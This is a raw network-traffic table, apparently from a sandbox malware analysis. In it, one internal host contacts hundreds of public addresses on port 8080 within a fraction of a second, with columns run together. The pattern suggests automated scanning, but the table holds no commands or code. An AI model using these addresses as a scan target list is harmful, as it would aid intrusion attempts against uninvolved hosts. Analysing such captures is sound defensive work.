                                                              Nov 13, 2023 22:18:01.693711996 CET139488080192.168.2.2362.219.159.85
                                                              Nov 13, 2023 22:18:01.693720102 CET139488080192.168.2.2362.250.135.194
                                                              Nov 13, 2023 22:18:01.693732977 CET139488080192.168.2.2394.203.98.47
                                                              Nov 13, 2023 22:18:01.693741083 CET139488080192.168.2.2394.147.142.252
                                                              Nov 13, 2023 22:18:01.693742990 CET139488080192.168.2.2385.179.237.222
                                                              Nov 13, 2023 22:18:01.693747997 CET139488080192.168.2.2331.44.129.116
                                                              Nov 13, 2023 22:18:01.693758011 CET139488080192.168.2.2395.36.77.127
                                                              Nov 13, 2023 22:18:01.693758011 CET139488080192.168.2.2394.116.191.7
                                                              Nov 13, 2023 22:18:01.693766117 CET139488080192.168.2.2362.227.176.192
                                                              Nov 13, 2023 22:18:01.693783998 CET139488080192.168.2.2385.196.225.157
                                                              Nov 13, 2023 22:18:01.693784952 CET139488080192.168.2.2331.170.137.64
                                                              Nov 13, 2023 22:18:01.693787098 CET139488080192.168.2.2394.92.67.33
                                                              Nov 13, 2023 22:18:01.693808079 CET139488080192.168.2.2394.103.148.24
                                                              Nov 13, 2023 22:18:01.693808079 CET139488080192.168.2.2331.151.31.135
                                                              Nov 13, 2023 22:18:01.693811893 CET139488080192.168.2.2331.144.235.151
                                                              Nov 13, 2023 22:18:01.693811893 CET139488080192.168.2.2394.222.9.99
                                                              Nov 13, 2023 22:18:01.693814993 CET139488080192.168.2.2331.141.172.66
                                                              Nov 13, 2023 22:18:01.693835974 CET139488080192.168.2.2394.118.145.131
                                                              Nov 13, 2023 22:18:01.693837881 CET139488080192.168.2.2331.235.191.180
                                                              Nov 13, 2023 22:18:01.693839073 CET139488080192.168.2.2395.141.118.213
                                                              Nov 13, 2023 22:18:01.693840027 CET139488080192.168.2.2385.12.207.18
                                                              Nov 13, 2023 22:18:01.693860054 CET139488080192.168.2.2394.244.35.42
                                                              Nov 13, 2023 22:18:01.693860054 CET139488080192.168.2.2394.92.167.103
                                                              Nov 13, 2023 22:18:01.693870068 CET139488080192.168.2.2362.41.21.5
                                                              Nov 13, 2023 22:18:01.693870068 CET139488080192.168.2.2331.168.153.31
                                                              Nov 13, 2023 22:18:01.693871021 CET139488080192.168.2.2385.189.3.39
                                                              Nov 13, 2023 22:18:01.693881035 CET139488080192.168.2.2395.205.38.177
                                                              Nov 13, 2023 22:18:01.693881035 CET139488080192.168.2.2385.26.41.17
                                                              Nov 13, 2023 22:18:01.693913937 CET139488080192.168.2.2394.224.15.165
                                                              Nov 13, 2023 22:18:01.693928957 CET139488080192.168.2.2362.22.116.135
                                                              Nov 13, 2023 22:18:01.693928957 CET139488080192.168.2.2331.61.220.76
                                                              Nov 13, 2023 22:18:01.693932056 CET139488080192.168.2.2331.145.142.59
                                                              Nov 13, 2023 22:18:01.693933010 CET139488080192.168.2.2385.101.41.59
                                                              Nov 13, 2023 22:18:01.693934917 CET139488080192.168.2.2395.32.113.91
                                                              Nov 13, 2023 22:18:01.693934917 CET139488080192.168.2.2362.241.67.27
                                                              Nov 13, 2023 22:18:01.693934917 CET139488080192.168.2.2385.88.35.156
                                                              Nov 13, 2023 22:18:01.693934917 CET139488080192.168.2.2385.168.164.158
                                                              Nov 13, 2023 22:18:01.693962097 CET139488080192.168.2.2385.222.170.36
                                                              Nov 13, 2023 22:18:01.693965912 CET139488080192.168.2.2362.170.51.122
                                                              Nov 13, 2023 22:18:01.693965912 CET139488080192.168.2.2385.163.62.201
                                                              Nov 13, 2023 22:18:01.693965912 CET139488080192.168.2.2385.170.103.93
                                                              Nov 13, 2023 22:18:01.693965912 CET139488080192.168.2.2395.5.207.197
                                                              Nov 13, 2023 22:18:01.693968058 CET139488080192.168.2.2362.153.160.95
                                                              Nov 13, 2023 22:18:01.693968058 CET139488080192.168.2.2394.77.97.41
                                                              Nov 13, 2023 22:18:01.693970919 CET139488080192.168.2.2362.198.247.152
                                                              Nov 13, 2023 22:18:01.693970919 CET139488080192.168.2.2385.113.233.149
                                                              Nov 13, 2023 22:18:01.693970919 CET139488080192.168.2.2395.91.46.105
                                                              Nov 13, 2023 22:18:01.693972111 CET139488080192.168.2.2385.29.144.170
                                                              Nov 13, 2023 22:18:01.693972111 CET139488080192.168.2.2331.43.87.112
                                                              Nov 13, 2023 22:18:01.693970919 CET139488080192.168.2.2385.55.9.181
                                                              Nov 13, 2023 22:18:01.693972111 CET139488080192.168.2.2385.127.85.248
                                                              Nov 13, 2023 22:18:01.693970919 CET139488080192.168.2.2395.36.142.28
                                                              Nov 13, 2023 22:18:01.693994999 CET139488080192.168.2.2385.45.137.203
                                                              Nov 13, 2023 22:18:01.693998098 CET139488080192.168.2.2395.29.192.210
                                                              Nov 13, 2023 22:18:01.694000006 CET139488080192.168.2.2385.45.192.86
                                                              Nov 13, 2023 22:18:01.694000959 CET139488080192.168.2.2385.154.114.181
                                                              Nov 13, 2023 22:18:01.694000959 CET139488080192.168.2.2395.180.89.111
                                                              Nov 13, 2023 22:18:01.694000959 CET139488080192.168.2.2385.155.209.238
                                                              Nov 13, 2023 22:18:01.694003105 CET139488080192.168.2.2362.128.92.234
                                                              Nov 13, 2023 22:18:01.694003105 CET139488080192.168.2.2331.72.185.70
                                                              Nov 13, 2023 22:18:01.694003105 CET139488080192.168.2.2395.125.236.120
                                                              Nov 13, 2023 22:18:01.694003105 CET139488080192.168.2.2395.218.219.250
                                                              Nov 13, 2023 22:18:01.694010019 CET139488080192.168.2.2395.227.5.50
                                                              Nov 13, 2023 22:18:01.694014072 CET139488080192.168.2.2331.153.223.36
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2395.189.201.16
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2394.97.86.253
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2394.24.156.80
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2385.100.244.213
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2394.200.5.238
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2385.120.166.25
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2395.37.220.92
                                                              Nov 13, 2023 22:18:01.694024086 CET139488080192.168.2.2395.76.0.100
                                                              Nov 13, 2023 22:18:01.694039106 CET139488080192.168.2.2362.77.104.122
                                                              Nov 13, 2023 22:18:01.694040060 CET139488080192.168.2.2395.127.220.49
                                                              Nov 13, 2023 22:18:01.694041014 CET139488080192.168.2.2395.192.51.92
                                                              Nov 13, 2023 22:18:01.694040060 CET139488080192.168.2.2331.188.181.43
                                                              Nov 13, 2023 22:18:01.694040060 CET139488080192.168.2.2394.230.83.139
                                                              Nov 13, 2023 22:18:01.694042921 CET139488080192.168.2.2385.113.199.162
                                                              Nov 13, 2023 22:18:01.694045067 CET139488080192.168.2.2385.65.234.11
                                                              Nov 13, 2023 22:18:01.694046021 CET139488080192.168.2.2394.47.205.58
                                                              Nov 13, 2023 22:18:01.694045067 CET139488080192.168.2.2385.126.44.217
                                                              Nov 13, 2023 22:18:01.694042921 CET139488080192.168.2.2385.249.88.104
                                                              Nov 13, 2023 22:18:01.694046021 CET139488080192.168.2.2385.200.220.60
                                                              Nov 13, 2023 22:18:01.694045067 CET139488080192.168.2.2385.80.246.184
                                                              Nov 13, 2023 22:18:01.694046021 CET139488080192.168.2.2331.96.74.211
                                                              Nov 13, 2023 22:18:01.694051981 CET139488080192.168.2.2385.142.4.29
                                                              Nov 13, 2023 22:18:01.694057941 CET139488080192.168.2.2395.228.56.232
                                                              Nov 13, 2023 22:18:01.694058895 CET139488080192.168.2.2394.173.193.7
                                                              Nov 13, 2023 22:18:01.694058895 CET139488080192.168.2.2385.143.128.95
                                                              Nov 13, 2023 22:18:01.694058895 CET139488080192.168.2.2362.141.12.216
                                                              Nov 13, 2023 22:18:01.694063902 CET139488080192.168.2.2394.46.111.237
                                                              Nov 13, 2023 22:18:01.694073915 CET139488080192.168.2.2362.35.127.152
                                                              Nov 13, 2023 22:18:01.694073915 CET139488080192.168.2.2395.145.229.146
                                                              Nov 13, 2023 22:18:01.694081068 CET139488080192.168.2.2385.186.247.122
                                                              Nov 13, 2023 22:18:01.694081068 CET139488080192.168.2.2362.148.103.27
                                                              Nov 13, 2023 22:18:01.694081068 CET139488080192.168.2.2395.96.214.49
                                                              Nov 13, 2023 22:18:01.694082022 CET139488080192.168.2.2331.228.125.31
                                                              Nov 13, 2023 22:18:01.694082975 CET139488080192.168.2.2395.54.153.137
                                                              Nov 13, 2023 22:18:01.694082022 CET139488080192.168.2.2395.225.15.149
                                                              Nov 13, 2023 22:18:01.694082022 CET139488080192.168.2.2395.21.138.106
                                                              Nov 13, 2023 22:18:01.694082022 CET139488080192.168.2.2394.254.248.202
                                                              Nov 13, 2023 22:18:01.694082975 CET139488080192.168.2.2331.60.248.251
                                                              Nov 13, 2023 22:18:01.694082975 CET139488080192.168.2.2394.191.174.127
                                                              Nov 13, 2023 22:18:01.694091082 CET139488080192.168.2.2395.111.124.232
                                                              Nov 13, 2023 22:18:01.694091082 CET139488080192.168.2.2385.109.229.27
                                                              Nov 13, 2023 22:18:01.694091082 CET139488080192.168.2.2362.61.217.171
                                                              Nov 13, 2023 22:18:01.694091082 CET139488080192.168.2.2331.53.210.50
                                                              Nov 13, 2023 22:18:01.694098949 CET139488080192.168.2.2331.243.61.245
                                                              Nov 13, 2023 22:18:01.694099903 CET139488080192.168.2.2395.230.157.54
                                                              Nov 13, 2023 22:18:01.694099903 CET139488080192.168.2.2395.40.253.62
                                                              Nov 13, 2023 22:18:01.694117069 CET139488080192.168.2.2331.71.103.194
                                                              Nov 13, 2023 22:18:01.694120884 CET139488080192.168.2.2362.107.155.168
                                                              Nov 13, 2023 22:18:01.694127083 CET139488080192.168.2.2395.3.84.245
                                                              Nov 13, 2023 22:18:01.694133043 CET139488080192.168.2.2395.126.78.56
                                                              Nov 13, 2023 22:18:01.694135904 CET139488080192.168.2.2385.80.49.2
                                                              Nov 13, 2023 22:18:01.694134951 CET139488080192.168.2.2331.55.72.114
                                                              Nov 13, 2023 22:18:01.694137096 CET139488080192.168.2.2394.47.242.234
                                                              Nov 13, 2023 22:18:01.694144011 CET139488080192.168.2.2395.67.232.40
                                                              Nov 13, 2023 22:18:01.694150925 CET139488080192.168.2.2331.62.105.160
                                                              Nov 13, 2023 22:18:01.694164038 CET139488080192.168.2.2385.18.253.248
                                                              Nov 13, 2023 22:18:01.694164991 CET139488080192.168.2.2395.108.200.46
                                                              Nov 13, 2023 22:18:01.694174051 CET139488080192.168.2.2394.152.162.160
                                                              Nov 13, 2023 22:18:01.694175005 CET139488080192.168.2.2395.70.132.135
                                                              Nov 13, 2023 22:18:01.694186926 CET139488080192.168.2.2331.146.24.146
                                                              Nov 13, 2023 22:18:01.694186926 CET139488080192.168.2.2385.15.200.127
                                                              Nov 13, 2023 22:18:01.694204092 CET139488080192.168.2.2362.20.117.197
                                                              Nov 13, 2023 22:18:01.694209099 CET139488080192.168.2.2331.87.239.189
                                                              Nov 13, 2023 22:18:01.694217920 CET139488080192.168.2.2394.50.17.127
                                                              Nov 13, 2023 22:18:01.694231987 CET139488080192.168.2.2362.143.55.228
                                                              Nov 13, 2023 22:18:01.694245100 CET139488080192.168.2.2362.161.7.18
                                                              Nov 13, 2023 22:18:01.694245100 CET139488080192.168.2.2331.98.160.115
                                                              Nov 13, 2023 22:18:01.694255114 CET139488080192.168.2.2394.53.39.143
                                                              Nov 13, 2023 22:18:01.694255114 CET139488080192.168.2.2331.19.209.146
                                                              Nov 13, 2023 22:18:01.694258928 CET139488080192.168.2.2385.141.95.155
                                                              Nov 13, 2023 22:18:01.694258928 CET139488080192.168.2.2395.114.120.2
                                                              Nov 13, 2023 22:18:01.694258928 CET139488080192.168.2.2385.35.187.111
                                                              Nov 13, 2023 22:18:01.694261074 CET139488080192.168.2.2331.27.156.35
                                                              Nov 13, 2023 22:18:01.694262981 CET139488080192.168.2.2395.13.73.244
                                                              Nov 13, 2023 22:18:01.694263935 CET139488080192.168.2.2395.251.106.151
                                                              Nov 13, 2023 22:18:01.694274902 CET139488080192.168.2.2331.111.63.57
                                                              Nov 13, 2023 22:18:01.694288015 CET139488080192.168.2.2394.166.144.32
                                                              Nov 13, 2023 22:18:01.694288015 CET139488080192.168.2.2394.31.236.194
                                                              Nov 13, 2023 22:18:01.694291115 CET139488080192.168.2.2385.174.227.143
                                                              Nov 13, 2023 22:18:01.694308043 CET139488080192.168.2.2362.190.29.112
                                                              Nov 13, 2023 22:18:01.694327116 CET139488080192.168.2.2394.108.156.242
                                                              Nov 13, 2023 22:18:01.694327116 CET139488080192.168.2.2331.9.82.91
                                                              Nov 13, 2023 22:18:01.694331884 CET139488080192.168.2.2394.32.77.100
                                                              Nov 13, 2023 22:18:01.694331884 CET139488080192.168.2.2394.131.153.92
                                                              Nov 13, 2023 22:18:01.694339037 CET139488080192.168.2.2362.28.182.23
                                                              Nov 13, 2023 22:18:01.694339037 CET139488080192.168.2.2395.255.181.170
                                                              Nov 13, 2023 22:18:01.694360971 CET139488080192.168.2.2385.230.27.70
                                                              Nov 13, 2023 22:18:01.694361925 CET139488080192.168.2.2331.84.135.210
                                                              Nov 13, 2023 22:18:01.694369078 CET139488080192.168.2.2395.192.0.17
                                                              Nov 13, 2023 22:18:01.694370031 CET139488080192.168.2.2394.0.207.53
                                                              Nov 13, 2023 22:18:01.694369078 CET139488080192.168.2.2331.6.230.71
                                                              Nov 13, 2023 22:18:01.694370031 CET139488080192.168.2.2385.107.185.125
                                                              Nov 13, 2023 22:18:01.694369078 CET139488080192.168.2.2362.142.7.126
                                                              Nov 13, 2023 22:18:01.694369078 CET139488080192.168.2.2331.153.169.204
                                                              Nov 13, 2023 22:18:01.694384098 CET139488080192.168.2.2395.148.184.188
                                                              Nov 13, 2023 22:18:01.694392920 CET139488080192.168.2.2331.205.226.114
                                                              Nov 13, 2023 22:18:01.694403887 CET139488080192.168.2.2395.192.38.78
                                                              Nov 13, 2023 22:18:01.694406986 CET139488080192.168.2.2331.11.254.238
                                                              Nov 13, 2023 22:18:01.694411039 CET139488080192.168.2.2385.101.112.164
                                                              Nov 13, 2023 22:18:01.694413900 CET139488080192.168.2.2385.8.188.170
                                                              Nov 13, 2023 22:18:01.694427013 CET139488080192.168.2.2385.115.7.42
                                                              Nov 13, 2023 22:18:01.694427013 CET139488080192.168.2.2362.199.184.208
                                                              Nov 13, 2023 22:18:01.694442987 CET139488080192.168.2.2385.32.191.5
                                                              Nov 13, 2023 22:18:01.694453955 CET139488080192.168.2.2395.2.14.228
                                                              Nov 13, 2023 22:18:01.694463015 CET139488080192.168.2.2394.187.145.151
                                                              Nov 13, 2023 22:18:01.694473028 CET139488080192.168.2.2331.57.47.20
                                                              Nov 13, 2023 22:18:01.694480896 CET139488080192.168.2.2395.44.62.87
                                                              Nov 13, 2023 22:18:01.694482088 CET139488080192.168.2.2394.2.244.154
                                                              Nov 13, 2023 22:18:01.694487095 CET139488080192.168.2.2385.135.75.23
                                                              Nov 13, 2023 22:18:01.694489002 CET139488080192.168.2.2385.56.122.144
                                                              Nov 13, 2023 22:18:01.694489002 CET139488080192.168.2.2395.126.7.218
                                                              Nov 13, 2023 22:18:01.694509029 CET139488080192.168.2.2385.71.206.56
                                                              Nov 13, 2023 22:18:01.694511890 CET139488080192.168.2.2385.168.143.189
                                                              Nov 13, 2023 22:18:01.694524050 CET139488080192.168.2.2395.184.223.180
                                                              Nov 13, 2023 22:18:01.694533110 CET139488080192.168.2.2385.199.133.189
                                                              Nov 13, 2023 22:18:01.694536924 CET139488080192.168.2.2385.45.171.37
                                                              Nov 13, 2023 22:18:01.694540977 CET139488080192.168.2.2331.220.27.233
                                                              Nov 13, 2023 22:18:01.694544077 CET139488080192.168.2.2385.229.12.186
                                                              Nov 13, 2023 22:18:01.694566965 CET139488080192.168.2.2395.113.123.79
                                                              Nov 13, 2023 22:18:01.694566965 CET139488080192.168.2.2395.30.122.143
                                                              Nov 13, 2023 22:18:01.694566965 CET139488080192.168.2.2385.36.69.231
                                                              Nov 13, 2023 22:18:01.694566965 CET139488080192.168.2.2331.219.86.111
                                                              Nov 13, 2023 22:18:01.694571018 CET139488080192.168.2.2395.167.83.7
                                                              Nov 13, 2023 22:18:01.694577932 CET139488080192.168.2.2385.11.238.133
                                                              Nov 13, 2023 22:18:01.694577932 CET139488080192.168.2.2395.84.10.93
                                                              Nov 13, 2023 22:18:01.694580078 CET139488080192.168.2.2331.57.213.92
                                                              Nov 13, 2023 22:18:01.694592953 CET139488080192.168.2.2331.7.213.30
                                                              Nov 13, 2023 22:18:01.694597960 CET139488080192.168.2.2394.79.232.70
                                                              Nov 13, 2023 22:18:01.694597960 CET139488080192.168.2.2394.143.62.217
                                                              Nov 13, 2023 22:18:01.694597960 CET139488080192.168.2.2395.25.201.108
                                                              Nov 13, 2023 22:18:01.694602966 CET139488080192.168.2.2362.162.27.52
                                                              Nov 13, 2023 22:18:01.694602966 CET139488080192.168.2.2331.192.226.202
                                                              Nov 13, 2023 22:18:01.694628000 CET139488080192.168.2.2385.10.240.187
                                                              Nov 13, 2023 22:18:01.694628000 CET139488080192.168.2.2331.144.161.0
                                                              Nov 13, 2023 22:18:01.694631100 CET139488080192.168.2.2331.40.127.162
                                                              Nov 13, 2023 22:18:01.694631100 CET139488080192.168.2.2395.144.27.128
                                                              Nov 13, 2023 22:18:01.694643974 CET139488080192.168.2.2385.220.206.76
                                                              Nov 13, 2023 22:18:01.694644928 CET139488080192.168.2.2362.158.37.15
                                                              Nov 13, 2023 22:18:01.694648027 CET139488080192.168.2.2394.144.119.236
                                                              Nov 13, 2023 22:18:01.694647074 CET139488080192.168.2.2394.107.162.174
                                                              Nov 13, 2023 22:18:01.694662094 CET139488080192.168.2.2331.3.177.116
                                                              Nov 13, 2023 22:18:01.694664001 CET139488080192.168.2.2394.222.248.43
                                                              Nov 13, 2023 22:18:01.694673061 CET139488080192.168.2.2362.97.49.5
                                                              Nov 13, 2023 22:18:01.694673061 CET139488080192.168.2.2395.80.135.250
                                                              Nov 13, 2023 22:18:01.694677114 CET139488080192.168.2.2395.1.89.227
                                                              Nov 13, 2023 22:18:01.694679976 CET139488080192.168.2.2362.93.106.140
                                                              Nov 13, 2023 22:18:01.694679976 CET139488080192.168.2.2362.107.142.133
                                                              Nov 13, 2023 22:18:01.694680929 CET139488080192.168.2.2395.241.118.11
                                                              Nov 13, 2023 22:18:01.694693089 CET139488080192.168.2.2385.144.13.98
                                                              Nov 13, 2023 22:18:01.694698095 CET139488080192.168.2.2362.34.29.211
                                                              Nov 13, 2023 22:18:01.694717884 CET139488080192.168.2.2362.233.116.72
                                                              Nov 13, 2023 22:18:01.694719076 CET139488080192.168.2.2385.154.133.230
                                                              Nov 13, 2023 22:18:01.694719076 CET139488080192.168.2.2395.152.252.2
                                                              Nov 13, 2023 22:18:01.694730043 CET139488080192.168.2.2331.47.158.145
                                                              Nov 13, 2023 22:18:01.694745064 CET139488080192.168.2.2394.146.104.224
                                                              Nov 13, 2023 22:18:01.694746017 CET139488080192.168.2.2362.191.30.185
                                                              Nov 13, 2023 22:18:01.694751024 CET139488080192.168.2.2395.38.68.174
                                                              Nov 13, 2023 22:18:01.694751978 CET139488080192.168.2.2385.76.241.45
                                                              Nov 13, 2023 22:18:01.694757938 CET139488080192.168.2.2395.254.120.202
                                                              Nov 13, 2023 22:18:01.694778919 CET139488080192.168.2.2395.7.41.62
                                                              Nov 13, 2023 22:18:01.694778919 CET139488080192.168.2.2395.97.179.227
                                                              Nov 13, 2023 22:18:01.694791079 CET139488080192.168.2.2385.24.50.22
                                                              Nov 13, 2023 22:18:01.694802046 CET139488080192.168.2.2385.133.84.13
                                                              Nov 13, 2023 22:18:01.694802999 CET139488080192.168.2.2331.111.116.116
                                                              Nov 13, 2023 22:18:01.694803953 CET139488080192.168.2.2394.97.209.139
                                                              Nov 13, 2023 22:18:01.694828987 CET139488080192.168.2.2362.37.150.248
                                                              Nov 13, 2023 22:18:01.694829941 CET139488080192.168.2.2385.115.149.229
                                                              Nov 13, 2023 22:18:01.694829941 CET139488080192.168.2.2385.145.40.239
                                                              Nov 13, 2023 22:18:01.694830894 CET139488080192.168.2.2395.138.174.62
                                                              Nov 13, 2023 22:18:01.694837093 CET139488080192.168.2.2385.163.253.103
                                                              Nov 13, 2023 22:18:01.694854021 CET139488080192.168.2.2331.95.28.251
                                                              Nov 13, 2023 22:18:01.694854975 CET139488080192.168.2.2362.71.5.232
                                                              Nov 13, 2023 22:18:01.694855928 CET139488080192.168.2.2385.29.32.21
                                                              Nov 13, 2023 22:18:01.694859982 CET139488080192.168.2.2331.103.31.112
                                                              Nov 13, 2023 22:18:01.694864988 CET139488080192.168.2.2385.5.199.159
                                                              Nov 13, 2023 22:18:01.694868088 CET139488080192.168.2.2394.112.96.81
                                                              Nov 13, 2023 22:18:01.694871902 CET139488080192.168.2.2395.79.49.128
                                                              Nov 13, 2023 22:18:01.694875002 CET139488080192.168.2.2331.175.187.167
                                                              Nov 13, 2023 22:18:01.694891930 CET139488080192.168.2.2394.209.97.50
                                                              Nov 13, 2023 22:18:01.694891930 CET139488080192.168.2.2385.6.99.246
                                                              Nov 13, 2023 22:18:01.694897890 CET139488080192.168.2.2394.0.184.247
                                                              Nov 13, 2023 22:18:01.694905043 CET139488080192.168.2.2385.163.25.99
                                                              Nov 13, 2023 22:18:01.694909096 CET139488080192.168.2.2331.65.135.176
                                                              Nov 13, 2023 22:18:01.694919109 CET139488080192.168.2.2395.182.217.135
                                                              Nov 13, 2023 22:18:01.694921970 CET139488080192.168.2.2394.177.216.224
                                                              Nov 13, 2023 22:18:01.694925070 CET139488080192.168.2.2394.162.20.3
                                                              Nov 13, 2023 22:18:01.694942951 CET139488080192.168.2.2395.53.106.139
                                                              Nov 13, 2023 22:18:01.694942951 CET139488080192.168.2.2362.246.122.193
                                                              Nov 13, 2023 22:18:01.694948912 CET139488080192.168.2.2362.153.38.248
                                                              Nov 13, 2023 22:18:01.694948912 CET139488080192.168.2.2362.83.83.89
                                                              Nov 13, 2023 22:18:01.694972038 CET139488080192.168.2.2362.99.157.222
                                                              Nov 13, 2023 22:18:01.694973946 CET139488080192.168.2.2331.29.2.72
                                                              Nov 13, 2023 22:18:01.694973946 CET139488080192.168.2.2362.235.172.61
                                                              Nov 13, 2023 22:18:01.694973946 CET139488080192.168.2.2362.227.40.197
                                                              Nov 13, 2023 22:18:01.694983959 CET139488080192.168.2.2331.226.177.78
                                                              Nov 13, 2023 22:18:01.694993019 CET139488080192.168.2.2394.63.232.142
                                                              Nov 13, 2023 22:18:01.695002079 CET139488080192.168.2.2385.146.255.181
                                                              Nov 13, 2023 22:18:01.695010900 CET139488080192.168.2.2395.159.72.0
                                                              Nov 13, 2023 22:18:01.695010900 CET139488080192.168.2.2395.229.25.231
                                                              Nov 13, 2023 22:18:01.695018053 CET139488080192.168.2.2362.175.70.252
                                                              Nov 13, 2023 22:18:01.695025921 CET139488080192.168.2.2331.65.3.119
                                                              Nov 13, 2023 22:18:01.695027113 CET139488080192.168.2.2362.235.85.146
                                                              Nov 13, 2023 22:18:01.695028067 CET139488080192.168.2.2395.179.204.28
                                                              Nov 13, 2023 22:18:01.695043087 CET139488080192.168.2.2385.178.81.172
                                                              Nov 13, 2023 22:18:01.695043087 CET139488080192.168.2.2395.234.195.26
                                                              Nov 13, 2023 22:18:01.695043087 CET139488080192.168.2.2385.130.19.222
                                                              Nov 13, 2023 22:18:01.695056915 CET139488080192.168.2.2385.30.249.148
                                                              Nov 13, 2023 22:18:01.695058107 CET139488080192.168.2.2385.47.238.118
                                                              Nov 13, 2023 22:18:01.695065022 CET139488080192.168.2.2395.156.251.33
                                                              Nov 13, 2023 22:18:01.695080996 CET139488080192.168.2.2362.112.115.32
                                                              Nov 13, 2023 22:18:01.695085049 CET139488080192.168.2.2395.185.23.204
                                                              Nov 13, 2023 22:18:01.695090055 CET139488080192.168.2.2395.238.162.77
                                                              Nov 13, 2023 22:18:01.695092916 CET139488080192.168.2.2395.240.151.35
                                                              Nov 13, 2023 22:18:01.695103884 CET139488080192.168.2.2362.150.208.214
                                                              Nov 13, 2023 22:18:01.695127010 CET139488080192.168.2.2395.188.238.197
                                                              Nov 13, 2023 22:18:01.695127010 CET139488080192.168.2.2331.149.159.237
                                                              Nov 13, 2023 22:18:01.695127010 CET139488080192.168.2.2362.137.47.10
                                                              Nov 13, 2023 22:18:01.695130110 CET139488080192.168.2.2362.101.78.75
                                                              Nov 13, 2023 22:18:01.695142984 CET139488080192.168.2.2395.77.233.175
                                                              Nov 13, 2023 22:18:01.695143938 CET139488080192.168.2.2395.156.54.146
                                                              Nov 13, 2023 22:18:01.695144892 CET139488080192.168.2.2395.65.79.184
                                                              Nov 13, 2023 22:18:01.695142984 CET139488080192.168.2.2362.247.34.254
                                                              Nov 13, 2023 22:18:01.695157051 CET139488080192.168.2.2362.21.244.100
                                                              Nov 13, 2023 22:18:01.695161104 CET139488080192.168.2.2395.149.77.227
                                                              Nov 13, 2023 22:18:01.695173025 CET139488080192.168.2.2394.132.194.19
                                                              Nov 13, 2023 22:18:01.695177078 CET139488080192.168.2.2395.206.140.177
                                                              Nov 13, 2023 22:18:01.695188999 CET139488080192.168.2.2394.229.226.76
                                                              Nov 13, 2023 22:18:01.695193052 CET139488080192.168.2.2331.151.1.120
                                                              Nov 13, 2023 22:18:01.695199013 CET139488080192.168.2.2395.87.55.79
                                                              Nov 13, 2023 22:18:01.695210934 CET139488080192.168.2.2394.57.33.171
                                                              Nov 13, 2023 22:18:01.695214033 CET139488080192.168.2.2362.226.185.244
                                                              Nov 13, 2023 22:18:01.695223093 CET139488080192.168.2.2394.239.128.13
                                                              Nov 13, 2023 22:18:01.695223093 CET139488080192.168.2.2362.129.112.181
                                                              Nov 13, 2023 22:18:01.695234060 CET139488080192.168.2.2385.183.142.226
                                                              Nov 13, 2023 22:18:01.695238113 CET139488080192.168.2.2395.38.179.71
                                                              Nov 13, 2023 22:18:01.695256948 CET139488080192.168.2.2394.196.138.244
                                                              Nov 13, 2023 22:18:01.695256948 CET139488080192.168.2.2394.62.107.230
                                                              Nov 13, 2023 22:18:01.695288897 CET139488080192.168.2.2385.55.103.214
                                                              Nov 13, 2023 22:18:01.695290089 CET139488080192.168.2.2385.46.194.36
                                                              Nov 13, 2023 22:18:01.695300102 CET139488080192.168.2.2395.88.9.24
                                                              Nov 13, 2023 22:18:01.695301056 CET139488080192.168.2.2385.145.61.69
                                                              Nov 13, 2023 22:18:01.695300102 CET139488080192.168.2.2331.229.56.107
                                                              Nov 13, 2023 22:18:01.695302010 CET139488080192.168.2.2331.217.122.127
                                                              Nov 13, 2023 22:18:01.695311069 CET139488080192.168.2.2385.149.63.155
                                                              Nov 13, 2023 22:18:01.695312977 CET139488080192.168.2.2395.75.189.206
                                                              Nov 13, 2023 22:18:01.695308924 CET139488080192.168.2.2362.209.222.51
                                                              Nov 13, 2023 22:18:01.695308924 CET139488080192.168.2.2362.142.213.243
                                                              Nov 13, 2023 22:18:01.695317984 CET139488080192.168.2.2394.40.120.158
                                                              Nov 13, 2023 22:18:01.695323944 CET139488080192.168.2.2331.217.212.211
                                                              Nov 13, 2023 22:18:01.695323944 CET139488080192.168.2.2394.72.1.61
                                                              Nov 13, 2023 22:18:01.695331097 CET139488080192.168.2.2395.97.248.177
                                                              Nov 13, 2023 22:18:01.695331097 CET139488080192.168.2.2395.117.151.202
                                                              Nov 13, 2023 22:18:01.695331097 CET139488080192.168.2.2362.151.19.112
                                                              Nov 13, 2023 22:18:01.695338964 CET139488080192.168.2.2394.32.88.108
                                                              Nov 13, 2023 22:18:01.695339918 CET139488080192.168.2.2394.238.127.229
                                                              Nov 13, 2023 22:18:01.695348978 CET139488080192.168.2.2395.50.35.179
                                                              Nov 13, 2023 22:18:01.695368052 CET139488080192.168.2.2395.38.220.124
                                                              Nov 13, 2023 22:18:01.695368052 CET139488080192.168.2.2394.230.144.84
                                                              Nov 13, 2023 22:18:01.695388079 CET139488080192.168.2.2331.65.214.187
                                                              Nov 13, 2023 22:18:01.695391893 CET139488080192.168.2.2385.12.1.124
                                                              Nov 13, 2023 22:18:01.695398092 CET139488080192.168.2.2362.223.109.237
                                                              Nov 13, 2023 22:18:01.695405006 CET139488080192.168.2.2395.43.207.175
                                                              Nov 13, 2023 22:18:01.695415020 CET139488080192.168.2.2385.244.115.57
                                                              Nov 13, 2023 22:18:01.695430040 CET139488080192.168.2.2331.173.183.73
                                                              Nov 13, 2023 22:18:01.695430040 CET139488080192.168.2.2385.195.57.192
                                                              Nov 13, 2023 22:18:01.695435047 CET139488080192.168.2.2385.227.26.158
                                                              Nov 13, 2023 22:18:01.695449114 CET139488080192.168.2.2385.18.194.18
                                                              Nov 13, 2023 22:18:01.695450068 CET139488080192.168.2.2362.169.83.205
                                                              Nov 13, 2023 22:18:01.695449114 CET139488080192.168.2.2395.37.81.165
                                                              Nov 13, 2023 22:18:01.695451021 CET139488080192.168.2.2385.231.16.106
                                                              Nov 13, 2023 22:18:01.695461035 CET139488080192.168.2.2395.191.184.186
                                                              Nov 13, 2023 22:18:01.695461988 CET139488080192.168.2.2385.79.21.188
                                                              Nov 13, 2023 22:18:01.695461988 CET139488080192.168.2.2394.123.226.46
                                                              Nov 13, 2023 22:18:01.695476055 CET139488080192.168.2.2331.18.109.3
                                                              Nov 13, 2023 22:18:01.695476055 CET139488080192.168.2.2394.160.26.51
                                                              Nov 13, 2023 22:18:01.695476055 CET139488080192.168.2.2395.253.72.248
